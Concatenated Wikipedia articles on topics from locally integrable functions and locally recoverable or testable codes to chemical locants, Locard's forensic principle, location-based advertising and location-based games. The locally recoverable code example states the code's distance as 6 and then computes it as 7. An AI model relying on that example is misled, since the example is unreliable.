Note: If Ω {\displaystyle \Omega } is an open subset of R n {\displaystyle \mathbb {R} ^{n}} that is also bounded, then one has the standard inclusion L p ( Ω ) ⊂ L 1 ( Ω ) {\displaystyle L_{p}(\Omega )\subset L_{1}(\Omega )} which makes sense given the above inclusion L 1 ( Ω ) ⊂ L 1 , l o c ( Ω ) {\displaystyle L_{1}(\Omega )\subset L_{1,loc}(\Omega )} . But the first of these statements is not true if Ω {\displaystyle \Omega } is not bounded; then it is still true that L p ( Ω ) ⊂ L 1 , l o c ( Ω ) {\displaystyle L_{p}(\Omega )\subset L_{1,loc}(\Omega )} for any p {\displaystyle p} , but not that L p ( Ω ) ⊂ L 1 ( Ω ) {\displaystyle L_{p}(\Omega )\subset L_{1}(\Omega )} . To see this, one typically considers the function u ( x ) = 1 {\displaystyle u(x)=1} , which is in L ∞ ( R n ) {\displaystyle L_{\infty }(\mathbb {R} ^{n})} but not in L p ( R n ) {\displaystyle L_{p}(\mathbb {R} ^{n})} for any finite p {\displaystyle p} .
Theorem 3 . A function f is the density of an absolutely continuous measure if and only if f ∈ L 1 , l o c {\displaystyle f\in L_{1,loc}} .
The proof of this result is sketched by ( Schwartz 1998 , p. 18). Rephrasing its statement, this theorem asserts that every locally integrable function defines an absolutely continuous measure and conversely that every absolutely continuous measures defines a locally integrable function: this is also, in the abstract measure theory framework, the form of the important Radon–Nikodym theorem given by Stanisław Saks in his treatise. [ 16 ]
Locally integrable functions play a prominent role in distribution theory and they occur in the definition of various classes of functions and function spaces , like functions of bounded variation . Moreover, they appear in the Radon–Nikodym theorem by characterizing the absolutely continuous part of every measure.
This article incorporates material from Locally integrable function on PlanetMath , which is licensed under the Creative Commons Attribution/Share-Alike License . | https://en.wikipedia.org/wiki/Locally_integrable_function |
In mathematics , particularly topology , a topological space X is locally normal if intuitively it looks locally like a normal space . [ 1 ] More precisely, a locally normal space satisfies the property that each point of the space belongs to a neighbourhood of the space that is normal under the subspace topology .
A topological space X is said to be locally normal if and only if each point, x , of X has a neighbourhood that is normal under the subspace topology . [ 2 ]
Note that not every neighbourhood of x has to be normal, but at least one neighbourhood of x has to be normal (under the subspace topology).
Note however, that if a space were called locally normal if and only if each point of the space belonged to a subset of the space that was normal under the subspace topology, then every topological space would be locally normal. This is because, the singleton { x } is vacuously normal and contains x . Therefore, the definition is more restrictive.
Čech, Eduard (1937). "On Bicompact Spaces" . Annals of Mathematics . 38 (4): 823– 844. doi : 10.2307/1968839 . ISSN 0003-486X . JSTOR 1968839 .
This topology-related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Locally_normal_space |
Locally recoverable codes are a family of error correction codes that were introduced first by D. S. Papailiopoulos and A. G. Dimakis [ 1 ] and have been widely studied in information theory due to their applications related to distributive and cloud storage systems. [ 2 ] [ 3 ] [ 4 ] [ 5 ]
An [ n , k , d , r ] q {\displaystyle [n,k,d,r]_{q}} LRC is an [ n , k , d ] q {\displaystyle [n,k,d]_{q}} linear code such that there is a function f i {\displaystyle f_{i}} that takes as input i {\displaystyle i} and a set of r {\displaystyle r} other coordinates of a codeword c = ( c 1 , … , c n ) ∈ C {\displaystyle c=(c_{1},\ldots ,c_{n})\in C} different from c i {\displaystyle c_{i}} , and outputs c i {\displaystyle c_{i}} .
Erasure-correcting codes , or simply erasure codes , for distributed and cloud storage systems, are becoming more and more popular as a result of the present spike in demand for cloud computing and storage services. This has inspired researchers in the fields of information and coding theory to investigate new facets of codes that are specifically suited for use with storage systems.
It is well-known that LRC is a code that needs only a limited set of other symbols to be accessed in order to restore every symbol in a codeword. This idea is very important for distributed and cloud storage systems since the most common error case is when one storage node fails (erasure). The main objective is to recover as much data as possible from the fewest additional storage nodes in order to restore the node. Hence, Locally Recoverable Codes are crucial for such systems.
The following definition of the LRC follows from the description above: an [ n , k , r ] {\displaystyle [n,k,r]} -Locally Recoverable Code (LRC) of length n {\displaystyle n} is a code that produces an n {\displaystyle n} -symbol codeword from k {\displaystyle k} information symbols, and for any symbol of the codeword, there exist at most r {\displaystyle r} other symbols such that the value of the symbol can be recovered from them. The locality parameter satisfies 1 ≤ r ≤ k {\displaystyle 1\leq r\leq k} because the entire codeword can be found by accessing k {\displaystyle k} symbols other than the erased symbol. Furthermore, Locally Recoverable Codes, having the minimum distance d {\displaystyle d} , can recover d − 1 {\displaystyle d-1} erasures.
Let C {\displaystyle C} be a [ n , k , d ] q {\displaystyle [n,k,d]_{q}} linear code . For i ∈ { 1 , … , n } {\displaystyle i\in \{1,\ldots ,n\}} , let us denote by r i {\displaystyle r_{i}} the minimum number of other coordinates we have to look at to recover an erasure in coordinate i {\displaystyle i} . The number r i {\displaystyle r_{i}} is said to be the locality of the i {\displaystyle i} -th coordinate of the code. The locality of the code is defined as
An [ n , k , d , r ] q {\displaystyle [n,k,d,r]_{q}} locally recoverable code (LRC) is an [ n , k , d ] q {\displaystyle [n,k,d]_{q}} linear code C ∈ F q n {\displaystyle C\in \mathbb {F} _{q}^{n}} with locality r {\displaystyle r} .
Let C {\displaystyle C} be an [ n , k , d ] q {\displaystyle [n,k,d]_{q}} -locally recoverable code. Then an erased component can be recovered linearly, [ 6 ] i.e. for every i ∈ { 1 , … , n } {\displaystyle i\in \{1,\ldots ,n\}} , the space of linear equations of the code contains elements of the form x i = f ( x i 1 , … , x i r ) {\displaystyle x_{i}=f(x_{i_{1}},\ldots ,x_{i_{r}})} , where i j ≠ i {\displaystyle i_{j}\neq i} .
Theorem [ 7 ] Let n = ( r + 1 ) s {\displaystyle n=(r+1)s} and let C {\displaystyle C} be an [ n , k , d ] q {\displaystyle [n,k,d]_{q}} -locally recoverable code having s {\displaystyle s} disjoint locality sets of size r + 1 {\displaystyle r+1} . Then
An [ n , k , d , r ] q {\displaystyle [n,k,d,r]_{q}} -LRC C {\displaystyle C} is said to be optimal if the minimum distance of C {\displaystyle C} satisfies
Let f ∈ F q [ x ] {\displaystyle f\in \mathbb {F} _{q}[x]} be a polynomial and let ℓ {\displaystyle \ell } be a positive integer . Then f {\displaystyle f} is said to be ( r {\displaystyle r} , ℓ {\displaystyle \ell } )-good if
We say that { A 1 , … , A ℓ {\displaystyle A_{1},\ldots ,A_{\ell }} } is a splitting covering for f {\displaystyle f} . [ 8 ]
The Tamo–Barg construction utilizes good polynomials. [ 9 ]
We will use x 5 ∈ F 41 [ x ] {\displaystyle x^{5}\in \mathbb {F} _{41}[x]} to construct [ 15 , 8 , 6 , 4 ] {\displaystyle [15,8,6,4]} -LRC. Notice that the degree of this polynomial is 5, and it is constant on A i {\displaystyle A_{i}} for i ∈ { 1 , … , 8 } {\displaystyle i\in \{1,\ldots ,8\}} , where A 1 = { 1 , 10 , 16 , 18 , 37 } {\displaystyle A_{1}=\{1,10,16,18,37\}} , A 2 = 2 A 1 {\displaystyle A_{2}=2A_{1}} , A 3 = 3 A 1 {\displaystyle A_{3}=3A_{1}} , A 4 = 4 A 1 {\displaystyle A_{4}=4A_{1}} , A 5 = 5 A 1 {\displaystyle A_{5}=5A_{1}} , A 6 = 6 A 1 {\displaystyle A_{6}=6A_{1}} , A 7 = 11 A 1 {\displaystyle A_{7}=11A_{1}} , and A 8 = 15 A 1 {\displaystyle A_{8}=15A_{1}} : A 1 5 = { 1 } {\displaystyle A_{1}^{5}=\{1\}} , A 2 5 = { 32 } {\displaystyle A_{2}^{5}=\{32\}} , A 3 5 = { 38 } {\displaystyle A_{3}^{5}=\{38\}} , A 4 5 = { 40 } {\displaystyle A_{4}^{5}=\{40\}} , A 5 5 = { 9 } {\displaystyle A_{5}^{5}=\{9\}} , A 6 5 = { 27 } {\displaystyle A_{6}^{5}=\{27\}} , A 7 5 = { 3 } {\displaystyle A_{7}^{5}=\{3\}} , A 8 5 = { 14 } {\displaystyle A_{8}^{5}=\{14\}} . Hence, x 5 {\displaystyle x^{5}} is a ( 4 , 8 ) {\displaystyle (4,8)} -good polynomial over F 41 {\displaystyle \mathbb {F} _{41}} by the definition. Now, we will use this polynomial to construct a code of dimension k = 8 {\displaystyle k=8} and length n = 15 {\displaystyle n=15} over F 41 {\displaystyle \mathbb {F} _{41}} . The locality of this code is 4, which will allow us to recover a single server failure by looking at the information contained in at most 4 other servers .
Next, let us define the encoding polynomial : f a ( x ) = ∑ i = 0 r − 1 f i ( x ) x i {\displaystyle f_{a}(x)=\sum _{i=0}^{r-1}f_{i}(x)x^{i}} , where f i ( x ) = ∑ i = 0 k r − 1 a i , j g ( x ) j {\displaystyle f_{i}(x)=\sum _{i=0}^{{\frac {k}{r}}-1}a_{i,j}g(x)^{j}} . So, f a ( x ) = {\displaystyle f_{a}(x)=} a 0 , 0 + {\displaystyle a_{0,0}+} a 0 , 1 x 5 + {\displaystyle a_{0,1}x^{5}+} a 1 , 0 x + {\displaystyle a_{1,0}x+} a 1 , 1 x 6 + {\displaystyle a_{1,1}x^{6}+} a 2 , 0 x 2 + {\displaystyle a_{2,0}x^{2}+} a 2 , 1 x 7 + {\displaystyle a_{2,1}x^{7}+} a 3 , 0 x 3 + {\displaystyle a_{3,0}x^{3}+} a 3 , 1 x 8 {\displaystyle a_{3,1}x^{8}} .
Thus, we can use the obtained encoding polynomial if we take our data to encode as the row vector a = {\displaystyle a=} ( a 0 , 0 , a 0 , 1 , a 1 , 0 , a 1 , 1 , a 2 , 0 , a 2 , 1 , a 3 , 0 , a 3 , 1 ) {\displaystyle (a_{0,0},a_{0,1},a_{1,0},a_{1,1},a_{2,0},a_{2,1},a_{3,0},a_{3,1})} . Encoding the vector m {\displaystyle m} to a length 15 message vector c {\displaystyle c} by multiplying m {\displaystyle m} by the generator matrix
For example, the encoding of information vector m = ( 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 ) {\displaystyle m=(1,1,1,1,1,1,1,1)} gives the codeword c = m G = ( 8 , 8 , 5 , 9 , 21 , 3 , 36 , 31 , 32 , 12 , 2 , 20 , 37 , 33 , 21 ) {\displaystyle c=mG=(8,8,5,9,21,3,36,31,32,12,2,20,37,33,21)} .
Observe that we constructed an optimal LRC; therefore, using the Singleton bound , we have that the distance of this code is d = n − k − ⌈ k r ⌉ + 2 = 15 − 8 − 2 + 2 = 7 {\displaystyle d=n-k-\left\lceil {\frac {k}{r}}\right\rceil +2=15-8-2+2=7} . Thus, we can recover any 6 erasures from our codeword by looking at no more than 8 other components.
A code C {\displaystyle C} has all-symbol locality r {\displaystyle r} and availability t {\displaystyle t} if every code symbol can be recovered from t {\displaystyle t} disjoint repair sets of other symbols, each set of size at most r {\displaystyle r} symbols. Such codes are called ( r , t ) a {\displaystyle (r,t)_{a}} -LRC. [ 10 ]
Theorem The minimum distance of [ n , k , d ] q {\displaystyle [n,k,d]_{q}} -LRC having locality r {\displaystyle r} and availability t {\displaystyle t} satisfies the upper bound
If the code is systematic and locality and availability apply only to its information symbols, then the code has information locality r {\displaystyle r} and availability t {\displaystyle t} , and is called ( r , t ) i {\displaystyle (r,t)_{i}} -LRC. [ 11 ]
Theorem [ 12 ] The minimum distance d {\displaystyle d} of an [ n , k , d ] q {\displaystyle [n,k,d]_{q}} linear ( r , t ) i {\displaystyle (r,t)_{i}} -LRC satisfies the upper bound | https://en.wikipedia.org/wiki/Locally_recoverable_code |
A locally testable code is a type of error-correcting code for which it can be determined if a string is a word in that code by looking at a small (frequently constant) number of bits of the string. In some situations, it is useful to know if the data is corrupted without decoding all of it so that appropriate action can be taken in response. For example, in communication, if the receiver encounters a corrupted code, it can request the data be re-sent, which could increase the accuracy of said data. Similarly, in data storage, these codes can allow for damaged data to be recovered and rewritten properly.
In contrast, locally decodable codes use a small number of bits of the codeword to probabilistically recover the original information. The fraction of errors determines how likely it is that the decoder correctly recovers the original bit; however, not all locally decodable codes are locally testable. [ 1 ]
Clearly, any valid codeword should be accepted as a codeword, but strings that are not codewords could be only one bit off, which would require many (certainly more than a constant number) probes. To account for this, testing failure is only defined if the string is off by at least a set fraction of its bits. This implies words of the code must be longer than the input strings by adding some redundancy.
To measure the distance between two strings, the Hamming distance is used
The distance of a string w {\displaystyle w} from a code C : { 0 , 1 } k → { 0 , 1 } n {\displaystyle C:\{0,1\}^{k}\to \{0,1\}^{n}} is computed by
Relative distances are computed as a fraction of the number of bits
A code C : { 0 , 1 } k → { 0 , 1 } n {\displaystyle C:\{0,1\}^{k}\to \{0,1\}^{n}} is called q {\displaystyle q} -local δ {\displaystyle \delta } -testable if there exists a Turing machine M given random access to an input w {\displaystyle w} that makes at most q {\displaystyle q} non-adaptive queries of w {\displaystyle w} and satisfies the following: [ 2 ]
Also the rate of a code is the ratio between its message length and codeword length
It remains an open question whether there are any locally testable codes of linear size, but there are several constructions that are considered "nearly linear": [ 3 ]
These have both been achieved, even with constant query complexity and a binary alphabet , such as with n = k 1 + 1 / ( log k ) c {\displaystyle n=k^{1+1/(\log k)^{c}}} for any c ∈ ( 0 , 1 ) {\displaystyle c\in (0,1)} .
The next nearly linear goal is linear up to a polylogarithmic factor; n = poly ( log k ) ∗ k {\displaystyle n={\text{poly}}(\log k)*k} . Nobody has yet to come up with a linearly testable code that satisfies this constraint. [ 3 ]
In November 2021 two preprints have reported [ 4 ] [ 5 ] [ 6 ] [ 7 ] the first polynomial-time construction of " c 3 {\displaystyle c^{3}} -LTCs" namely locally testable codes with constant rate r {\displaystyle r} , constant distance δ {\displaystyle \delta } and constant locality q {\displaystyle q} .
Locally testable codes have a lot in common with probabilistically checkable proofs (PCPs). This should be apparent from the similarities of their construction. In both, we are given q {\displaystyle q} random nonadaptive queries into a large string and if we want to accept, we must with probability 1, and if not, we must accept no more than half the time. The major difference is that PCPs are interested in accepting x {\displaystyle x} if there exists a w {\displaystyle w} so that M w ( x ) = 1 {\displaystyle M^{w}(x)=1} . Locally testable codes, on the other hand, accept w {\displaystyle w} if it is part of the code. Many things can go wrong in assuming a PCP proof encodes a locally testable code. For example, the PCP definition says nothing about invalid proofs, only invalid inputs.
Despite this difference, locally testable codes and PCPs are similar enough that frequently to construct one, a prover will construct the other along the way. [ 8 ]
One of the most famous error-correcting codes, the Hadamard code , is a locally testable code. A codeword x is encoded in the Hadamard code to be the linear function f ( y ) = ∑ i x i y i {\displaystyle f(y)={\sum _{i}{x_{i}y_{i}}}} (mod 2). This requires listing out the result of this function for every possible y, which requires exponentially more bits than its input. To test if a string w is a codeword of the Hadamard code, all we have to do is test if the function it encodes is linear. This means simply checking if w ( x ) ⊕ w ( y ) = w ( x ⊕ y ) {\displaystyle w(x)\oplus w(y)=w(x\oplus y)} for x and y uniformly random vectors (where ⊕ {\displaystyle \oplus } denotes bitwise XOR ).
It is easy to see that for any valid encoding w {\displaystyle w} , this equation is true, as that is the definition of a linear function. Somewhat harder, however, is showing that a string that is δ {\displaystyle \delta } -far from C will have an upper bound on its error in terms of δ {\displaystyle \delta } . One bound is found by the direct approach of approximating the chances of exactly one of the three probes yielding an incorrect result. Let A, B, and C be the events of w ( x ) {\displaystyle w(x)} , w ( y ) {\displaystyle w(y)} , and w ( x ⊕ y ) {\displaystyle w(x\oplus y)} being incorrect. Let E be the event of exactly one of these occurring. This comes out to
This works for 0 < δ ≤ 5 / 16 {\displaystyle 0<\delta \leq 5/16} , but shortly after, 3 δ − 6 δ 2 < δ {\displaystyle 3\delta -6\delta ^{2}<\delta } . With additional work, it can be shown that the error is bounded by
For any given δ {\displaystyle \delta } , this only has a constant chance of false positives, so we can simply check a constant number of times to get the probability below 1/2. [ 3 ]
The Long code is another code with very large blowup which is close to locally testable. Given an input 0 ≤ i ≤ 2 k {\displaystyle 0\leq i\leq 2^{k}} (note, this takes k {\displaystyle k} bits to represent), the function that returns the i t h {\displaystyle i^{th}} bit of the input, f i ( x ) = x i {\displaystyle f_{i}(x)=x_{i}} , is evaluated on all possible 2 k {\displaystyle 2^{k}} -bit inputs 0 ≤ x ≤ 2 2 k {\displaystyle 0\leq x\leq 2^{2^{k}}} , and the codeword is the concatenation of these (of length n = 2 2 k {\displaystyle n=2^{2^{k}}} ). The way to locally test this with some errors is to pick a uniformly random input x {\displaystyle x} and set y = x {\displaystyle y=x} , but with a small chance of flipping each bit, μ > 0 {\displaystyle \mu >0} . Accept a function f {\displaystyle f} as a codeword if f ( x ) = f ( y ) {\displaystyle f(x)=f(y)} . If f {\displaystyle f} is a codeword, this will accept f {\displaystyle f} as long as x i {\displaystyle x_{i}} was unchanged, which happens with probability 1 − μ {\displaystyle 1-\mu } . This violates the requirement that codewords are always accepted, but may be good enough for some needs. [ 9 ]
Other locally testable codes include Reed-Muller codes (see locally decodable codes for a decoding algorithm), Reed-Solomon codes , and the short code. | https://en.wikipedia.org/wiki/Locally_testable_code |
In the nomenclature of organic chemistry , a locant is a term to indicate the position of a functional group or substituent within a molecule . [ 1 ]
The International Union of Pure and Applied Chemistry (IUPAC) recommends the use of numeric prefixes to indicate the position of substituents, generally by identifying the parent hydrocarbon chain and assigning the carbon atoms based on their substituents in order of precedence . For example, there are at least two isomers of the linear form of pentanone , a ketone that contains a chain of exactly five carbon atoms. There is an oxygen atom bonded to one of the middle three carbons (if it were bonded to an end carbon, the molecule would be an aldehyde , not a ketone), but it is not clear where it is located.
In this example, the carbon atoms are numbered from one to five, which starts at one end and proceeds sequentially along the chain. Now the position of the oxygen atom can be defined as on carbon atom number two, three or four. However, atoms two and four are exactly equivalent - which can be shown by turning the molecule around by 180 degrees.
The locant is the number of the carbon atom to which the oxygen atom is bonded. If the oxygen is bonded to the middle carbon, the locant is 3. If the oxygen is bonded to an atom on either side (adjacent to an end carbon), the locant is 2 or 4; given the choice here, where the carbons are exactly equivalent, the lower number is always chosen. So the locant is either 2 or 3 in this molecule.
The locant is incorporated into the name of the molecule to remove ambiguity. Thus the molecule is named either pentan-2-one or pentan-3-one , depending on the position of the oxygen atom.
Any side chains can be present in the place of oxygen and it can be defined as simply the number on the carbon to which any thing other than a hydrogen is attached.
Another common system uses Greek letter prefixes as locants, which is useful in identifying the relative location of carbon atoms as well as hydrogen atoms to other functional groups.
The α-carbon ( alpha -carbon) refers to the first carbon atom that attaches to a functional group , such as a carbonyl . The second carbon atom is called the β-carbon ( beta -carbon), the third is the γ-carbon ( gamma -carbon), and the naming system continues in alphabetical order. [ 2 ]
The nomenclature can also be applied to the hydrogen atoms attached to the carbon atoms. A hydrogen atom attached to an α-carbon is called an α-hydrogen , a hydrogen atom on the β-carbon is a β-hydrogen , and so on.
Organic molecules with more than one functional group can be a source of confusion. Generally the functional group responsible for the name or type of the molecule is the 'reference' group for purposes of carbon-atom naming. For example, the molecules nitrostyrene and phenethylamine are quite similar; the former can even be reduced into the latter. However, nitrostyrene's α-carbon atom is adjacent to the phenyl group; in phenethylamine this same carbon atom is the β-carbon atom, as phenethylamine (being an amine rather than a styrene) counts its atoms from the opposite "end" of the molecule. [ 3 ]
In proteins and amino acids , the α-carbon is the backbone carbon before the carbonyl carbon atom in the molecule. Therefore, reading along the backbone of a typical protein would give a sequence of –[N—Cα—carbonyl C] n – etc. (when reading in the N to C direction). The α-carbon is where the different substituents attach to each different amino acid. That is, the groups hanging off the chain at the α-carbon are what give amino acids their diversity. These groups give the α-carbon its stereogenic properties for every amino acid except for glycine . Therefore, the α-carbon is a stereocenter for every amino acid except glycine. Glycine also does not have a β-carbon, while every other amino acid does.
The α-carbon of an amino acid is significant in protein folding . When describing a protein, which is a chain of amino acids, one often approximates the location of each amino acid as the location of its α-carbon. In general, α-carbons of adjacent amino acids in a protein are about 3.8 ångströms (380 picometers ) apart.
The α-carbon is important for enol - and enolate -based carbonyl chemistry as well. Chemical transformations affected by the conversion to either an enolate or an enol, in general, lead to the α-carbon acting as a nucleophile , becoming, for example, alkylated in the presence of primary haloalkane . An exception is in reaction with silyl chlorides , bromides , and iodides , where the oxygen acts as the nucleophile to produce silyl enol ether . | https://en.wikipedia.org/wiki/Locant |
In forensic science , Locard's principle holds that the perpetrator of a crime will bring something into the crime scene and leave with something from it, and that both can be used as forensic evidence . Dr. Edmond Locard (1877–1966) was a pioneer in forensic science who became known as the Sherlock Holmes of Lyon, France. [ 1 ] He formulated the basic principle of forensic science as: "Every contact leaves a trace". It is generally understood as "with contact between two items, there will be an exchange." Paul L. Kirk [ 2 ] expressed the principle as follows:
Wherever he steps, whatever he touches, whatever he leaves, even unconsciously, will serve as a silent witness against him. Not only his fingerprints or his footprints, but his hair, the fibres from his clothes, the glass he breaks, the tool mark he leaves, the paint he scratches, the blood or semen he deposits or collects. All of these and more, bear mute witness against him. This is evidence that does not forget. It is not confused by the excitement of the moment. It is not absent because human witnesses are. It is factual evidence. Physical evidence cannot be wrong, it cannot perjure itself, it cannot be wholly absent. Only human failure to find it, study and understand it, can diminish its value.
Fragmentary or trace evidence is any type of material left at (or taken from) a crime scene, or the result of contact between two surfaces, such as shoes and the floor covering or soil, or fibres from where someone sat on an upholstered chair.
When a crime is committed, fragmentary (or trace) evidence needs to be collected from the scene. A team of specialised police technicians goes to the scene of the crime and seals it off. They record video and take photographs of the crime scene, victim/s (if there are any) and items of evidence. If necessary, they undertake ballistics examinations. They check for foot, shoe, and tire mark impressions, plus hair as well as examine any vehicles and check for fingerprints – whole or partial.
Locard's Principle also holds in computer forensics, where committing cyber crime will result in a digital trace being left behind. [ 3 ]
In season 3, episode 15 of Father Brown , Inspector Sullivan and Frank Albert discuss this principle, which plays into the investigation.
In season 1, episode 10 of Sister Boniface Mysteries , the title character imagines Locard appearing to expound on his principle.
In season 2, episode 21 of Law & Order: Special Victims Unit , Locard's principle is mentioned and used in the investigation into a serial killer.
In season 9, episode 5 of Death in Paradise , DI Neville Parker uses Locard's principle to solve a murder disguised as a suicide. | https://en.wikipedia.org/wiki/Locard's_exchange_principle |
Location-based advertising ( LBA ) is a form of advertising that integrates mobile advertising with location-based services . The technology is used to pinpoint consumers location and provide location-specific advertisements on their mobile devices .
According to Bruner and Kumar, "LBA refers to marketer -controlled information specially tailored for the place where users access an advertising medium ". [ 1 ]
There are two types of location-based services in general: push and pull.
The push approach is more versatile and is divided into two types. A not requested service ( opt-out ) is the more common approach amongst the two approaches, as this allows advertisers to target users until the users do not want the ads to be sent to them. By contrast, through using the opt-in approach the users can determine what type of advertisements or promotional material they can receive from the advertisers. The advertisers must abide by certain legal regulations set in place and respect users' choices.
In contrast, using the LBA pull approach, users can directly search for information by entering certain keywords . The users look for specific information and not the other way around. For example, a traveler visiting New York could use a local search application such as WHERE on her device to find the nearest local Chinese restaurant in Manhattan. After she selects one of the restaurants, a map is provided as well as an offer of a free appetizer good for the next hour. [ 2 ]
Location-based advertising is closely related to mobile advertising, [ 3 ] which is divided into four types: [ clarification needed ]
For push-based LBA, users must opt-into the company's LBA program; this would most likely be done via the seller's website or at the store. Then users would be requested to provide their personal information, such as mobile phone number, first name, and other related information. After the data are all submitted, the company would send a text message requesting users to confirm the LBA subscription. Once these steps have been completed, the company can now use location-based technology to provide their customers with geographically based offers and incentives.
For pull-based LBA, users interact with local, typically mobile, sites or applications, and are presented offers in a standard pull advertising model. Location-based advertising companies like go2 Media aggregate local listings from yellow page companies, local directories, group discount businesses and others. Users are presented these ads as display advertising integrated with publisher content or search advertising in response to user queries.
In addition to directly opting in, users may see location-based display ads served from a location-based ad aggregator/network such as NAVTEQ or AdLocal by Cirius Technologies. [ 4 ]
LBA, as a form of direct marketing , allows marketers to reach specific target audiences. Bruner and Kumar state that LBA enhances the ability to reach people in a much more targeted manner than was possible in the past. [ 5 ] For example, if a customer has purchased a Harry Potter movie from a DVD/CD rental store and subscribed to the store's LBA program, he can expect to receive a message on his mobile phone about the release date of the next Harry Potter movie, including a movie sample, while he is on the train going back home.
Since LBA can improve advertising relevance by giving the customer control over what, when, where, and how they receive ads, it provides them with more relevant information, personalized message, and targeted offer. Vidaille (2007) stated, “With a targeted message, we’ve reached about 20 percent response rate. That’s incredibly good”. [ 6 ] The internet can do similar things, such as sending new information about products, promotional coupons , or asking consumers' opinion, but few people respond to e-mail marketing because it’s not personal anymore. In contrast, LBA gives consumers relevant information rather than spam; therefore, it increases the chances of getting higher responses.
Finally, unlike other traditional media , LBA, in addition to being used as advertising, can also be used to research consumers [ clarification needed ] which can be used to tailor future offers. [ 7 ] “Consumers are constantly providing information on their behavior through mobile internet activity”. [ 8 ] With location-based service, surveys can take place in the real world, in real time, rather than in halls, in a focus group facility, or on a PC. Mobile survey can be integrated with a marketing campaign; the results of customer satisfaction research can be used iteratively to guide the next campaign. For example, a restaurant that is experiencing increased competition can use the specific database – a collection of small mobile surveys of customers who had used coupons from the LBA in the geographic area – to determine their dining preferences, times, and occasions. Marketers can also use customers' past consumption patterns to forecast future patterns and send special dining offers to the target population at the right place and time, in order to build interest, response, and interaction to the restaurant.
The mobile phone is an incredibly personal tool. However, as Darling pointed out, “The fact that mobile device is so personal can be both a strength and a weakness”. [ 9 ] On one hand, marketers can entertain, inform, build brand awareness, create loyalty, and drive purchase decision among their target consumers through LBA. On the other hand, consumer privacy is still a concern. [ 10 ] Therefore, the establishment of a well thought-out consumer privacy and preference management policy is critical to the long-term success of LBA. Marketers should inform their consumers on how their information is to be stored, secured, and used or combined with other purposes of marketing. If LBA can assist people in their everyday life, they will be more than happy to reveal their location. To conclude, in order to ensure continue success and long-term longevity of LBA, consumer trust must be established and maintained. LBA needs to be permission-based and marketers must take great strides in protecting customers' privacy and respecting their preferences. In International Journal of Mobile Marketing , Banerjee and Dholakia found that the response to LBA depends not only on the type of location but also the kind of activity the individual is engaged in. [ 11 ] They are more likely to prefer LBA in public places and during leisure time.
Another major concern for LBA is spam ; consumers can easily perceive LBA as spam if it is done inappropriately. According to Fuller, spam is defined as “any unsolicited marketing message sent via electronic mail or to a mobile phone”. [ 12 ] In short, spam is an unwanted message that is delivered even though a user has not requested for it. Since the customer is in control and all activities are voluntary, customers' objective, goals, and emotions must be taken into account. A recent [ when? ] survey showed that users spend only 8 to 10 seconds on mobile advertisements. [ 13 ] Therefore, the interaction must be straightforward and simple. Marketers must also develop relevant and engaging advertising content that mobile users want to access at the right place and time. More importantly, marketers must make sure that their offer contains real value for the customer, and must follow strict opt-in policies. The best way for marketers to distance from spam is to give consumers choice, control, and confidentiality while insuring that they only received relevant information.
Misuse of LBA can result in claims for a product or service that the advertiser cannot substantiate. Advertisements and advertorials that incorporate the geographical location of the customer have the potential to breach advertising rules, standards and codes of conduct in many legislatures. For instance, the UK Advertising Standards Authority (ASA) requires all advertisements to be honest, truthful and not mislead. [ citation needed ] Since the promoter will not know the final wording of the advertisement in every case, it cannot undergo a proper compliance check. A claim such as "[location] woman loses 10 pounds with our new diet plan" is clearly false, since it cannot be substantiated for the majority of geographies where the advertisement might appear. Claims based on LBA have been ruled misleading by the ASA on a case-by-case basis. [ 14 ] | https://en.wikipedia.org/wiki/Location-based_advertising |
A location-based game (also called location-enabled game , geolocation-based game , or simply geo game ) is a type of game in which the gameplay evolves and progresses via a player's real world location. Location-based games must provide some mechanism to allow the player to report their location, usually with GPS . Many location-based video games are video games that run on a mobile phone , using its GPS capability.
“Urban games” or “street games” are typically multiplayer location-based games played using city streets and built up urban environments. Various mobile devices can be used to play location-based games. These games have been referred to as “location-based mobile games,” [ 1 ] merging the concept of location-based games and mobile games .
Location based-games can be digital or physical in nature. For example, Geocaching is an outdoor recreational activity in which participants use a Global Positioning System (GPS) receiver or mobile device and other navigational techniques to hide and seek containers. In contrast, games such as Pokémon Go are fully contained in digital devices with very little to no interaction or effect on the physical world.
Some location-based games that are video games have used embedded mobile technologies such as near field communication , Bluetooth and UWB . Such video games have also commonly used augmented reality to create an immersive experience. Games such as Pokémon Go and Ingress also use an Image Linked Map (ILM) interface, where approved geotagged locations appear on a stylized map generated based on GPS data for the user to interact with. [ 2 ]
Early location-based video games typically used SMS as a medium and located players using cellular network 's control plane locating requiring no additional capabilities from the user's device. [ 3 ]
Location-based games may induce learning, with researchers having observed that these activities produce learning that is social, experiential and situated. [ 4 ] It supports learning in Geography and other subjects including environmental education . Learning, however, is related to the objectives of the game designers. In a survey of location-based games, (Avouris & Yiannoutsou, 2012) [ 5 ] it was observed that in terms of the main objective, these games may be categorized as ludic (e.g., games that are created for fun), pedagogic, (e.g., games created mainly for learning), and hybrid, (e.g., games with mixed objectives). The ludic group, are to a large extent action oriented, involving either shooting, action or treasure hunt type of activities. These are weakly related to a narrative and a virtual world.
The role-playing version of these games have a higher learning potential, which has been confirmed by studies on students using location based games for learning. [ 6 ] On the other hand, the social interaction that takes place and skills related to strategic decisions, observation, planning and physical activity are the main characteristics of this strand in terms of learning. The pedagogic group of games involve participatory simulators, situated language learning and educational action games. Finally, the hybrid games are mostly museum location-based games and mobile fiction, or city fiction.
In a paper titled "Death by Pokémon GO ", researchers at Purdue University ’s Krannert School of Management claim the game caused "a disproportionate increase in vehicular crashes and associated vehicular damage, personal injuries, and fatalities in the vicinity of locations, called PokéStops, where users can play the game while driving." [ 7 ] Using data from one municipality, the paper extrapolates what that might mean nationwide and concluded "the increase in crashes attributable to the introduction of Pokémon GO is 145,632 with an associated increase in the number of injuries of 29,370 and an associated increase in the number of fatalities of 256 over the period of 6 July 2016, through 30 November 2016." The authors extrapolated the cost of those crashes and fatalities at between $2 billion and $7.3bn for the same period.
The nature of location-based gaming may mean that certain real-world locations will be visited by higher-than-normal numbers of people who are playing the game, which generally has been received favorably by nearby attractions or local businesses. However, these games may generate activity at locations that are privately-owned or have access limits, or otherwise cause undesirable congestion.
